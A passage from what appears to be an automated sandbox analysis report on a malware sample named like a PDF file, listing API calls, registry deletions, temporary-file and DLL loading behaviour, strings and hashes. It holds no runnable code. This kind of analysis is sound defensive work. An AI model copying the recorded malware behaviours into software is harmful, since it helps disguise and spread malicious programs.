                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateValuelstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp
                                                                      • API String ID: 1356686001-1930588908
                                                                      • Opcode ID: d2cc6d77e9ba14248a047d72dd7d9f6a3aa8facb63e6006dd0d76643cfd04d8e
                                                                      • Instruction ID: f509f4240a3e10e7eaa3df5a693eb391f4e90e3bb863c7dbc5285fb3648b227d
                                                                      • Opcode Fuzzy Hash: d2cc6d77e9ba14248a047d72dd7d9f6a3aa8facb63e6006dd0d76643cfd04d8e
                                                                      • Instruction Fuzzy Hash: 6B117571E00108BFEB10EBA5DE89EAF767DEB54358F10403AF605B71D1D6B85D419B28
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 937 4059d1-4059db 938 4059dc-405a07 GetTickCount GetTempFileNameA 937->938 939 405a16-405a18 938->939 940 405a09-405a0b 938->940 942 405a10-405a13 939->942 940->938 941 405a0d 940->941 941->942
                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 004059E5
                                                                      • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059FF
                                                                      Strings
                                                                      • nsa, xrefs: 004059DC
                                                                      • "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe", xrefs: 004059D1
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004059D4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: CountFileNameTempTick
                                                                      • String ID: "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                      • API String ID: 1716503409-3719421255
                                                                      • Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                      • Instruction ID: dd1ff100f75867a5ea1a308fa9af71207a38e4cfd515e0737c49d63577dfb4aa
                                                                      • Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                      • Instruction Fuzzy Hash: D0F0E2327082047BDB109F15EC04B9B7B9CDFD1720F10C037FA04EA1C0D2B198448B98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 943 402a7a-402aa3 RegOpenKeyExA 944 402aa5-402ab0 943->944 945 402b0e-402b12 943->945 946 402acb-402adb RegEnumKeyA 944->946 947 402ab2-402ab5 946->947 948 402add-402aef RegCloseKey call 4060c8 946->948 949 402b02-402b05 RegCloseKey 947->949 950 402ab7-402ac9 call 402a7a 947->950 956 402af1-402b00 948->956 957 402b15-402b1b 948->957 954 402b0b-402b0d 949->954 950->946 950->948 954->945 956->945 957->954 958 402b1d-402b2b RegDeleteKeyA 957->958 958->954 959 402b2d 958->959 959->945
                                                                      APIs
                                                                      • RegOpenKeyExA.KERNELBASE(?,?,00000000,?,?), ref: 00402A9B
                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Close$DeleteEnumOpen
                                                                      • String ID:
                                                                      • API String ID: 1912718029-0
                                                                      • Opcode ID: d3726fd62f486be70a3594a3b8fbaf41a64e02cd9dbe9a8d3bb385f6c1247452
                                                                      • Instruction ID: e0b40e6d550d0c6dedecb0be42375ee7245bd63e637183e656586a56a8cfacd8
                                                                      • Opcode Fuzzy Hash: d3726fd62f486be70a3594a3b8fbaf41a64e02cd9dbe9a8d3bb385f6c1247452
                                                                      • Instruction Fuzzy Hash: 66116D31A00108FEDF22AF90DE89EAA3B7DEB54349B104436FA01B10E0D774AE51DB69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                        • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                        • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001768
                                                                      • FreeLibrary.KERNEL32(?), ref: 100017DF
                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                        • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2
                                                                        • Part of subcall function 10002589: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FB
                                                                        • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13469690913.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000000.00000002.13469666290.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13469717075.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13469744190.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10000000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                      • String ID:
                                                                      • API String ID: 1791698881-3916222277
                                                                      • Opcode ID: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
                                                                      • Instruction ID: 7bd52774c71d274dd6e07030a7ef65efb9a892d3f5f2eddd47f658e3267813e4
                                                                      • Opcode Fuzzy Hash: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
                                                                      • Instruction Fuzzy Hash: B5319C79408205DAFB41DF649CC5BCA37ECFF042D5F018465FA0A9A09EDF78A8858B60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                      • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Timeout
                                                                      • String ID: !
                                                                      • API String ID: 1777923405-2657877971
                                                                      • Opcode ID: 22b2b84ea6fcd6b14ed9c5c60211004c3ca56765c3c02eadf23789df00b13e66
                                                                      • Instruction ID: 4a41e99441af98314081ed165e1285c49616552a54b2ccacd5bb7637226e5887
                                                                      • Opcode Fuzzy Hash: 22b2b84ea6fcd6b14ed9c5c60211004c3ca56765c3c02eadf23789df00b13e66
                                                                      • Instruction Fuzzy Hash: 76216271A44108BFEB12AFB0C94AAAD7B75DB44308F14807EF541B61D1D6B885419B29
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FBB
                                                                        • Part of subcall function 00404F48: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,00000000,0041B020,762923A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                        • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,00000000,0041B020,762923A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                        • Part of subcall function 00404F48: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,00402FFA,00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,00000000,0041B020,762923A0), ref: 00404FA4
                                                                        • Part of subcall function 00404F48: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll), ref: 00404FB6
                                                                        • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                        • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                        • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                      • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                                      • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                      • String ID:
                                                                      • API String ID: 2987980305-0
                                                                      • Opcode ID: 05630326f1bd519bde5c4de3ea5bb4b46a5dd0ab86cb976c5128ba56ceecd2b7
                                                                      • Instruction ID: 2138191ccfc75e686ed6e38fe7ddd30e16a5f0053d2c4fe6557c99b01bfc6870
                                                                      • Opcode Fuzzy Hash: 05630326f1bd519bde5c4de3ea5bb4b46a5dd0ab86cb976c5128ba56ceecd2b7
                                                                      • Instruction Fuzzy Hash: 58212B72904211EBDF217F658E4CAAE3671AB45318F30423BF701B62D0D7BC4946D66E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 0040583A: CharNextA.USER32(?,?,0042AC70,?,004058A6,0042AC70,0042AC70,76293410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,76293410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
                                                                        • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
                                                                        • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861
                                                                      • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                        • Part of subcall function 0040540E: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
                                                                      • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Skoleophold,00000000,00000000,000000F0), ref: 00401634
                                                                      Strings
                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Skoleophold, xrefs: 00401629
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Skoleophold
                                                                      • API String ID: 1892508949-3007469680
                                                                      • Opcode ID: 7188fab01f49ece1fc3d3e3b23cf81e7f7d703405b400d5c747525d0e762397e
                                                                      • Instruction ID: add3044d5edc1dd1b42d505c238b4ff4158083b6ff7b93d5c81ca089004ad06d
                                                                      • Opcode Fuzzy Hash: 7188fab01f49ece1fc3d3e3b23cf81e7f7d703405b400d5c747525d0e762397e
                                                                      • Instruction Fuzzy Hash: C7112736504141ABEF217B650C415BF37B4EAA6325738463FE592B22E2C63C4943A63F
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13469690913.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000000.00000002.13469666290.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13469717075.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13469744190.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10000000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: EnumErrorLastWindows
                                                                      • String ID:
                                                                      • API String ID: 14984897-0
                                                                      • Opcode ID: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                                      • Instruction ID: 700bf99a33fcd989ee77f819fa46e2371db99389a88ce2eb288524e3b596c0af
                                                                      • Opcode Fuzzy Hash: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                                      • Instruction Fuzzy Hash: 9751A2BA908214DFFB10DF64DCC674937A4EB443D4F21842AEA08E726DCF34A9808B95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,000001C9,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                      • RegQueryValueExA.KERNELBASE(00000000,00000000,?,?,?,?), ref: 00402440
                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nspCEF8.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID:
                                                                      • API String ID: 3677997916-0
                                                                      • Opcode ID: 5d02d39d18c7420ae23421be02b47941236429407c77bad0b73785f5ea68c250
                                                                      • Instruction ID: 7890893f0b843e6db6fa7552cbbd45c8f95600c1d4b4a320ca67a90271c7f2f1
                                                                      • Opcode Fuzzy Hash: 5d02d39d18c7420ae23421be02b47941236429407c77bad0b73785f5ea68c250
                                                                      • Instruction Fuzzy Hash: 4511A771905205EFDF14DF64CA889AEBBB4EF15348F20443FE542B72C0D2B84A45DB6A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                      • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
                                                                      • Instruction ID: 5e1477e87fe007c5129b9736e49814af818948606251066a5de5a0362d6646fb
                                                                      • Opcode Fuzzy Hash: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
                                                                      • Instruction Fuzzy Hash: DC012831B242109BE7295B389C04B6A369CE710319F51863BF811F72F1D678EC02CB4D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,000001C9,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                      • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402327
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00402330
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: CloseDeleteOpenValue
                                                                      • String ID:
                                                                      • API String ID: 849931509-0
                                                                      • Opcode ID: d3e0ab3d232ec2ff4644ea3c35e983a9a942872944a83cfb3dafb9f4e3a41141
                                                                      • Instruction ID: 0b5ea08ab0382a988395d3fa8ff755f3119953e7a6b53afab80e2150babb3da0
                                                                      • Opcode Fuzzy Hash: d3e0ab3d232ec2ff4644ea3c35e983a9a942872944a83cfb3dafb9f4e3a41141
                                                                      • Instruction Fuzzy Hash: E9F04433A00110ABEB10BBA48A4EAAE72699B54344F14443BF201B71C1D9BD4D12966D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                        • Part of subcall function 0040605A: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
                                                                        • Part of subcall function 0040605A: wsprintfA.USER32 ref: 004060AA
                                                                        • Part of subcall function 0040605A: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                      • String ID:
                                                                      • API String ID: 2547128583-0
                                                                      • Opcode ID: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                      • Instruction ID: 98ccb2102d83f5f685579eea27cf19d97b4e550a260e46f586538f412ce47dd7
                                                                      • Opcode Fuzzy Hash: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                      • Instruction Fuzzy Hash: 19E08632644111ABD320A7749D0493B72A89E85740302483EF506F2181DB38DC21A669
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe,80000000,00000003), ref: 004059A6
